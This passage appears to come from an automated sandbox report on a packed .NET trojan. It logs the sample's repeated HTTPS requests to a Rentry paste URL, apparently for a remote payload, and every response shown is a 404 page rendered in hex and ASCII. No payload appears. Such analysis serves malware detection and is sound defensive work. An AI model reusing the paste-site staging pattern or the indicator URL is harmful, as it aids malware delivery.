                                                                                        2024-10-18 10:43:00 UTC717INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:00 UTC1369INData Raw: 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                        Data Ascii: operty="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta property
                                                                                        2024-10-18 10:43:00 UTC1369INData Raw: 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                        Data Ascii: pt.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <div
                                                                                        2024-10-18 10:43:00 UTC1005INData Raw: 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 63 36 63 62 65 62 34 38 36 62 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 34 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d
                                                                                        Data Ascii: .min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ecc6cbeb486b',t:'MTcyOTI0ODE4MC4wMDAwMDA='}
                                                                                        2024-10-18 10:43:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.660668104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:02 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:02 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:02 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hrumjhLDWNDjHhCsui4KAw7JjMusQY1MsI4WKW4vE22AfwiQ19KROFr3oLt6LjuAFpBZCiDJpKavJlGfgQV6vx5Fsdp%2Fnu9DoFKMd76h%2B2gbOYNNFq3awuadBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ecd419b1e843-DFW
                                                                                        2024-10-18 10:43:02 UTC715INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:02 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:43:02 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:43:02 UTC1007INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 64 34 31 39 62 31 65 38 34 33 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 34 4d 69 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ecd419b1e843',t:'MTcyOTI0ODE4Mi4wMDAwMDA=
                                                                                        2024-10-18 10:43:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.660669104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:04 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:05 UTC652INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:05 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vluy%2F40RPw3P4p2RnpMc77f1oqdiz7BvxAFgNariTodd0lP2uxZ9UaBdzTd0VDWfnylCx0BWa6mEkZBo5rWoj4SZP4gYEex0NKbIGRoDvI66GOy2kCWvvxAow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ece278c92e51-DFW
                                                                                        2024-10-18 10:43:05 UTC717INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:05 UTC1369INData Raw: 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                                                                                        Data Ascii: operty="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta property
                                                                                        2024-10-18 10:43:05 UTC1369INData Raw: 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                        Data Ascii: pt.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <div
                                                                                        2024-10-18 10:43:05 UTC1005INData Raw: 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 65 32 37 38 63 39 32 65 35 31 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 34 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
                                                                                        Data Ascii: .min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ece278c92e51',t:'MTcyOTI0ODE4NS4wMDAwMDA='}
                                                                                        2024-10-18 10:43:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.660671104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:06 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:43:07 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:07 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFXdOLLmcDcheFB3YDf%2B%2BzzeMqpVhLikIWAqa6eyCbxYmxORtSShoi39ZNKokv6y3U%2F0RiN8tMJQ3HphYOqiDTcfQax03xiFXWQMnnvDBPky09OShBeA3ca2rA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ecf0ef342e78-DFW
                                                                                        2024-10-18 10:43:07 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:07 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:43:07 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:07 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 66 30 65 66 33 34 32 65 37 38 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 34 4e 79 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ecf0ef342e78',t:'MTcyOTI0ODE4Ny4wMDAwMD
                                                                                        2024-10-18 10:43:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.660672104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:08 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:09 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:09 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LErP%2BgPknLU5yAfwRtf53VTaDcBA5Fame9ClvIktnfTKq8n65QyE5lM%2FuQle3gFWz3v2ZkRFCDd0oc7ENyl%2FJ0YdtjloqZwp%2FejQdd%2BaTRhZbk%2BlXl8yUlwbug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ecfcc962a91e-DFW
